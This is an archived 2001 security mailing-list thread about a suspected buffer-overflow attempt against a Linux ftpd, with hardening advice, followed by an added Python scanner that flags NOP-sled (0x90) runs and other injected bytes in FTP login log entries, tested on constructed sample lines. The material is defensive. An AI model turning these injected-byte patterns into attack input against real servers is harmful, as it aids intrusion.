Security Incidents mailing list archives
Re: Linux ftpd
From: centipede <centiped () netvision net il>
Date: Sat, 09 Jun 2001 19:25:41 +0300
Simple. Another intrusion from APNIC... the swamp... It's a buffer overflow exploit they were trying to run on your ftp server. Whether they succeeded or not I cannot say. There's a lot to be done:

- D'ya really need those anonymous connections? If not, shut the door close.
- D'ya use the latest version of your server?
- D'ya employ any packet filtering device? If you do, block the swamp out...
- Use TCP Wrapper to limit connections from known IPs.

centipede.

mrcbis () tin it wrote:
I have a linux-box running slackware 7.1 with kernel 2.2.18 acting as office-server; we have an internet-connection in dial-up to an ISP near us. Today I was looking into log-files, I found, in /var/log/messages the following message:

Jun 3 21:30:05 sassuolo ftpd[24355]: ANONYMOUS FTP LOGIN FROM 202.239.131.55 [202.239.131.55],

repeated twice within few minutes. I think it was an intrusion attempt. My linux-box is connected to the internet with dynamic-ip-address. Can someone help me?

Best regards
Marco Bisio
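A log check for the kind of entry reported in this thread, added here as an example and not part of the original posts: it flags ANONYMOUS FTP LOGIN lines whose trailing field holds non-printable bytes, a run of 0x90 bytes, or an implausible length. The field layout is taken from the quoted entry; the thresholds, the handling of `<90>`-style pager escapes and the sample lines are assumptions constructed for the example.

```python
import re

# Assumed layout, modelled on the entry quoted in this thread:
#   <time> <host> ftpd[<pid>]: ANONYMOUS FTP LOGIN FROM <name> [<ip>], <field>
LOGIN_RE = re.compile(
    rb"ftpd\[(\d+)\]: ANONYMOUS FTP LOGIN FROM \S+ \[([0-9.]+)\], ?(.*)$")
PAGER_ESC = re.compile(rb"<([0-9A-Fa-f]{2})>")  # bytes rendered as <90> by a pager
NOP_RUN = re.compile(rb"\x90{8,}")              # assumed threshold: 8 in a row
MAX_FIELD_LEN = 128                             # assumed upper bound for the field

def classify_field(field):
    """Return the reasons a login field looks like injected binary data."""
    # Turn pager-style escapes back into the raw bytes they stand for.
    raw = PAGER_ESC.sub(lambda m: bytes([int(m.group(1), 16)]), field)
    reasons = []
    if len(raw) > MAX_FIELD_LEN:
        reasons.append("overlong")
    if any(b < 0x20 or b > 0x7E for b in raw):
        reasons.append("non-printable")
    if NOP_RUN.search(raw):
        reasons.append("0x90-run")
    return reasons

def scan(lines):
    """Return one finding per suspicious anonymous-login line (bytes input)."""
    findings = []
    for line in lines:
        m = LOGIN_RE.search(line.rstrip(b"\r\n"))
        if not m:
            continue  # not an anonymous FTP login entry
        reasons = classify_field(m.group(3))
        if reasons:
            findings.append({"pid": int(m.group(1)),
                             "ip": m.group(2).decode("ascii"),
                             "reasons": reasons})
    return findings

# Constructed sample lines (documentation addresses, filler bytes only).
PREFIX = b"Jun  3 21:30:05 host1 ftpd[%d]: ANONYMOUS FTP LOGIN FROM %s [%s], "
SAMPLE = [
    PREFIX % (101, b"client.example", b"192.0.2.10") + b"guest@example.org\n",
    PREFIX % (102, b"198.51.100.7", b"198.51.100.7") + b"\x90" * 40 + b"\xcc" * 4 + b"\n",
    PREFIX % (103, b"198.51.100.7", b"198.51.100.7") + b"<90>" * 40 + b"\n",
    b"Jun  3 21:31:00 host1 sshd[200]: session opened\n",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Open the log in binary mode (`open(path, "rb")`) so the raw bytes reach the scanner unchanged.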
